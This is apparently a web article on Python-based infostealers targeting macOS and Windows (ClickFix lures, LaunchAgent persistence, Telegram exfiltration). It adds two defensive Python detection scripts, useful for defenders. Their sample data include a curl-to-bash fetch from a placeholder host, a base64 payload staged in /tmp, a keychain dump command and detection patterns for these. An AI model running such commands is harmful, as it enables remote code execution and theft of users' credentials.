
Cybercriminals Use Python to Attack Windows and Mac Simultaneously
TL;DR
Cybercriminals are expanding their operations to target users of macOS, Apple’s operating system, in addition to Windows. By using the multipurpose programming language Python, these attacks become more efficient and far-reaching.
Microsoft notes that the use of Python allows attackers to "reuse code and reach heterogeneous environments with minimal overhead," saving time and maximizing the impact of attacks.
Python, by its nature, enables criminals to develop malware that operates across various operating systems with minimal modifications. Thus, a malicious program can be quickly adapted for both Windows and macOS.
This shift in the attack landscape is significant because macOS has historically been perceived as more secure than Windows, leaving many of its users with a false sense of protection.
ClickFix Transformed the Scenario
The most common entry point for these attacks is the technique of malvertising, where malicious ads are displayed on search platforms like Google Ads. These ads disguise themselves as legitimate and target users seeking popular applications.
When a victim clicks on an apparently legitimate ad, they are redirected to a fake site that mimics the original. On these sites, instructions are offered that promise to resolve technical problems or provide software downloads.
The ClickFix technique is then applied: the fake site instructs the victim to copy a command and paste it into the macOS Terminal. Terminal executes commands directly on the system, so a pasted command runs with the user's privileges and can potentially grant the malware elevated permissions.
Data Extraction as the Main Objective
Malicious files are often installers in DMG format, specific to macOS, similar to the executable .exe files of Windows. This malware is designed to steal information from the victim.
Among the known variants of malware are Atomic macOS Stealer, MacSync, and DigitStealer, all with the common goal of extracting valuable data.
These attacks stand out for their sophistication, utilizing legitimate features of macOS to operate without writing files to the hard drive, complicating detection. Criminals exploit native utilities and the automation language AppleScript, making identification by antivirus programs challenging.
The malware searches for browser credentials, such as saved passwords, as well as information from the iCloud Keychain, which centralizes stored credentials.
Malware Persistence on the System
Once installed, the malware aims to ensure its presence on the system. In macOS, this can be done by modifying property lists (plists) or by creating launch agents, functioning similarly to Windows registry keys.
The communication between the malware and the criminals occurs through disguised channels, such as the messaging app Telegram, used for remote control and sending stolen data.
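As an added illustration of the persistence mechanism described above (example code written for this page, not from Microsoft or any of the malware families named), the following Python script inspects LaunchAgent property lists the way a defender would: it parses each plist, extracts the command line that launchd would run, and flags entries that start at login or are kept alive while invoking an interpreter, a download tool, or a program staged in a temporary directory. The sample plists are constructed for the example, and the suspicious-token list is an assumption chosen here, not a published detection rule.

```python
import plistlib
import tempfile
from pathlib import Path

# Heuristic markers for a LaunchAgent command line (assumption for this example).
SUSPICIOUS_TOKENS = ("python", "osascript", "curl", "base64", "/tmp/", "bash -c")

# Constructed sample plists: one ordinary vendor agent, one that launches a
# Python loader from a hidden temp directory, and one that is not a plist at all.
SAMPLE_PLISTS = {
    "com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup",
        "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/backup-agent", "--daemon"],
        "RunAtLoad": True,
    }),
    "com.example.suspicious.plist": plistlib.dumps({
        "Label": "com.example.suspicious",
        "ProgramArguments": ["/bin/bash", "-c", "/usr/bin/python3 /tmp/.cache/loader.py"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "broken.plist": b"this is not a property list",
}


def classify_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one LaunchAgent plist and report its label, trigger flags and command line."""
    data = plistlib.loads(plist_bytes)
    args = list(data.get("ProgramArguments") or [])
    if "Program" in data:            # a plist may name the binary separately
        args = [data["Program"]] + args
    cmdline = " ".join(str(a) for a in args)
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in cmdline.lower()]
    run_at_load = bool(data.get("RunAtLoad", False))
    keep_alive = bool(data.get("KeepAlive", False))   # may be a bool or a dict
    return {
        "label": data.get("Label", "<no label>"),
        "run_at_load": run_at_load,
        "keep_alive": keep_alive,
        "cmdline": cmdline,
        "hits": hits,
        # Persistence + interpreter/download/temp-dir marker is what we care about.
        "suspicious": bool(hits) and (run_at_load or keep_alive),
    }


def scan_launch_agents(directory: Path) -> list:
    """Classify every *.plist in a directory; unparseable files are surfaced as suspicious."""
    results = []
    for path in sorted(directory.glob("*.plist")):
        try:
            info = classify_launch_agent(path.read_bytes())
        except Exception as exc:
            info = {"label": path.name, "run_at_load": False, "keep_alive": False,
                    "cmdline": "", "hits": [f"unparseable: {exc}"], "suspicious": True}
        info["path"] = str(path)
        results.append(info)
    return results


def demo() -> list:
    """Write the constructed samples to a temp dir and scan them (offline, self-contained)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in SAMPLE_PLISTS.items():
            Path(tmp, name).write_bytes(blob)
        return scan_launch_agents(Path(tmp))


if __name__ == "__main__":
    # Against a real machine, point scan_launch_agents at ~/Library/LaunchAgents.
    for entry in demo():
        flag = "SUSPICIOUS" if entry["suspicious"] else "ok"
        print(f"{flag:10} {entry['label']:28} {entry['cmdline']} {entry['hits']}")
```

Results are sorted by file name, so a reviewer can diff successive runs; a real deployment would point `scan_launch_agents` at the user and system LaunchAgents and LaunchDaemons folders and keep a baseline of known-good labels.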
WhatsApp as a Distribution Vector
Microsoft warns about campaigns that use WhatsApp to disseminate malware, such as the Eternal Stealer, where messages from known contacts or groups contain links that install the malware.
This method is effective because trust in WhatsApp messages lowers the user's guard. Another vector involves fake PDF editors that, through SEO poisoning, appear in searches such as "free PDF editor".
By installing these tools, the victim activates an infostealer that collects data from the installed browsers.
Consequences for Users and Businesses
The impacts of the attacks extend beyond password theft. Access to corporate credentials poses risks to the security of sensitive information and access to business systems, potentially resulting in financial fraud and ransomware attacks.
Protection Measures
Microsoft recommends several security practices to minimize risks:
- Education on how malicious ads work, and distrust of suspicious messages and downloads;
- Monitoring activities in the Terminal, which can signal compromise;
- Tracking access to the iCloud Keychain, avoiding unauthorized access;
- Analyzing network traffic for suspicious requests indicating data exfiltration.
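To make the monitoring measures above concrete, here is an added Python example (written for this page, not Microsoft's published detection logic) that runs simple indicator rules over two kinds of records a defender already collects: shell command history from the Terminal, and web proxy logs. The command rules look for the ClickFix pattern of piping a download straight into a shell or interpreter, base64-decoded payloads, inline AppleScript, removal of the quarantine flag, executables staged in temp folders, and command-line access to the Keychain; the network rule looks for the Telegram Bot API, which the article names as a covert control and exfiltration channel. The log lines and the rules themselves are constructed assumptions for the example.

```python
import re
from dataclasses import dataclass

# Indicator rules are heuristics chosen for this example (assumption), not vendor signatures.
COMMAND_RULES = [
    ("download piped into shell/interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|zsh|python3?)\b")),
    ("base64-decoded payload", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("inline AppleScript via osascript", re.compile(r"\bosascript\s+-e\b")),
    ("quarantine flag removed", re.compile(r"\bxattr\s+(-d|-rd|-r\s+-d)\s+com\.apple\.quarantine")),
    ("executable staged in temp dir", re.compile(r"\bchmod\s+\+x\s+(/tmp|/private/tmp|/var/folders)/")),
    ("keychain accessed from command line",
     re.compile(r"\bsecurity\s+(dump-keychain|find-(generic|internet)-password)\b")),
]
NETWORK_RULES = [
    ("Telegram Bot API contacted (possible C2/exfil)", re.compile(r"api\.telegram\.org/bot")),
]

# zsh extended-history prefix ": <epoch>:<elapsed>;" is stripped before matching.
ZSH_HISTORY_PREFIX = re.compile(r"^: \d+:\d+;")

# Constructed sample records (not real captures).
SAMPLE_SHELL_HISTORY = [
    ": 1700000001:0;ls -la ~/Downloads",
    ": 1700000002:0;brew install wget",
    ": 1700000003:0;curl -fsSL https://update-placeholder.invalid/fix.sh | bash",
    ": 1700000004:0;echo aGVsbG8= | base64 -d > /tmp/.x && chmod +x /tmp/.x",
    ": 1700000005:0;security dump-keychain login.keychain",
    ": 1700000006:0;git status",
]
SAMPLE_PROXY_LOG = [
    "2024-05-01T10:00:01Z alice GET https://www.apple.com/ 200",
    "2024-05-01T10:00:05Z alice POST https://api.telegram.org/bot<TOKEN-PLACEHOLDER>/sendDocument 200",
    "2024-05-01T10:00:09Z alice GET https://example.com/docs 200",
]


@dataclass(frozen=True)
class Finding:
    source: str    # "terminal" or "network"
    rule: str
    evidence: str


def scan_commands(history_lines) -> list:
    """Apply COMMAND_RULES to each shell-history line; one Finding per rule hit."""
    findings = []
    for raw in history_lines:
        cmd = ZSH_HISTORY_PREFIX.sub("", raw).strip()
        for name, rx in COMMAND_RULES:
            if rx.search(cmd):
                findings.append(Finding("terminal", name, cmd))
    return findings


def scan_network(proxy_lines) -> list:
    """Apply NETWORK_RULES to each proxy-log line."""
    findings = []
    for line in proxy_lines:
        for name, rx in NETWORK_RULES:
            if rx.search(line):
                findings.append(Finding("network", name, line.strip()))
    return findings


def scan_all(history_lines=SAMPLE_SHELL_HISTORY, proxy_lines=SAMPLE_PROXY_LOG) -> list:
    return scan_commands(history_lines) + scan_network(proxy_lines)


def summarize(findings) -> dict:
    """Count hits per rule so an analyst sees which behaviours dominate."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_all():
        print(f"[{f.source}] {f.rule}: {f.evidence}")
    print(summarize(scan_all()))
```

A single history line can trigger several rules (the base64-decode line above also stages an executable in /tmp), which is useful context: the combination of decode, stage and execute in one pasted command is far more telling than any one indicator alone. In production the inputs would come from a unified-log or EDR feed rather than history files, since a ClickFix victim's shell may not persist history at all.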
Content selected and edited with AI assistance. Original sources referenced above.


